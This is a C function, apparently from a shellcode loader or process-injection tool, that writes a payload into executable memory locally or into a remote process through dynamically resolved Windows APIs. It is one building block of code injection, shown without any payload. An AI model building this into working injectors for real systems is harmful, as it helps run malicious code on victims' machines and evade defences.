void WritePayload(HANDLE hTargetProcess, void* pBaseAddress, const unsigned char* payload, SIZE_T payload_len) {
    if (hTargetProcess == (HANDLE)-1) {
        // Local Write
        if (pfnRtlMoveMemory) {
            DEBUG_PRINT("WritePayload: Copying payload to local memory (RtlMoveMemory)...");
            
            ULONG oldProt = 0;
            PVOID protAddr = pBaseAddress;
            SIZE_T protSize = payload_len;
            
            if (pfnNtProtectVirtualMemory) {
                 pfnNtProtectVirtualMemory(GetCurrentProcess(), &protAddr, &protSize, PAGE_READWRITE, &oldProt);
            }
            
            pfnRtlMoveMemory(pBaseAddress, payload, payload_len);
            
            if (pfnNtProtectVirtualMemory) {
                 protAddr = pBaseAddress; 
                 protSize = payload_len;
                 pfnNtProtectVirtualMemory(GetCurrentProcess(), &protAddr, &protSize, PAGE_EXECUTE_READ, &oldProt);
            }
            
        } else {
            DEBUG_PRINT("WritePayload: pfnRtlMoveMemory is NULL!");
        }
    } else {
        if (pfnWriteProcessMemory) {
            DEBUG_PRINT("WritePayload: Writing payload to remote process (WriteProcessMemory)...");
            SIZE_T bytesWritten = 0;
            if (!pfnWriteProcessMemory(hTargetProcess, pBaseAddress, payload, payload_len, &bytesWritten)) {
                DEBUG_PRINT("WritePayload: WriteProcessMemory failed! Error: %lu", pfnGetLastError ? pfnGetLastError() : 0);
            }
        } else {
            DEBUG_PRINT("WritePayload: pfnWriteProcessMemory is NULL!");
        }
    }
}
